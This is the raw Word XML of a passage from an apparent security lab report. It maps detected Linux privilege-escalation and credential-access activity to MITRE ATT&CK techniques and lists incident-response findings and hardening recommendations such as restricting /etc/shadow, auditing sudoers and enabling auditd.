        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="2827D882" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09F69766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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1548.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="541AE3F8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Sudo and Sudo Caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26A8789D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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="5AAD2E2A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BA9B2EB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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1087.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5841A3FB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Local Account Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="693CC061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Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="724780A2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40D0F4CC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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1552.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B4C1366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Credentials In Files (/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/shadow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2090E901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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1ABC61DD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C1ECCAD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2C5282"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1078.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="049ECC36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Valid Accounts: Local Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B0CF268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Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48032C35" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Incident Response Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC3CDB0" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00BA2BC0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1200" w:right="60" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="548E70E9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EB6AA03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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Alert Triage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00A4FD1A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 xml:space="preserve">Root execution via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirmed — user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sabry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> on 0xsabry host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="0D06D379" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="778E89C3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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Impact Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3247F175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Sensitive file /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/shadow accessed — potential credential exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1CF01CE4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59EB84C0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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B5091A4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Restrict /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/shadow access: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 640 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="3288AE62" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42912846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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55C2F047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 xml:space="preserve">Audit </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file — remove unnecessary </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="700051CA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4096B03B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4A2A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C0E0C8"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A0C8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FF39DF9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 xml:space="preserve">Enable </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auditd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> for comprehensive privilege escalation monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="574EA7CB" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8808DC" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>OVERALL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK; COVERAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8D244" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="375" w:line="334" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t>Across all three scenarios, the combined detection pipeline (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) identified activity mapped to 12 distinct MITRE ATT&amp;CK; techniques spanning 6 tactics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337355F" w14:textId="3762F8D2" w:rsidR="00BA2BC0" w:rsidRDefault="00BA2BC0" w:rsidP="000E505A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:left w:val="single" w:sz="32" w:space="0" w:color="1A6B3C"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="1A6B3C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:after="127" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="60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6"/>
        <w:gridCol w:w="3456"/>
        <w:gridCol w:w="2448"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="24F8949C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08075FF9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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE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1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DF97A7F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w="2448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE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1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06DD25F8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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D0647AC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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="497AC8F6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F69F9B7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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1110 / T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F9DC18A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Brute Force / Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72169FE0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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69003EEC" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="30D723E0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="067C6E6C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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1021.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EA4CBAC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Remote Services: SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4326664B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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="332F18CC" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="6CB26E10" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48881314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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2750C3C7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Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60737724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Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48AE95B7" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="02155994" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
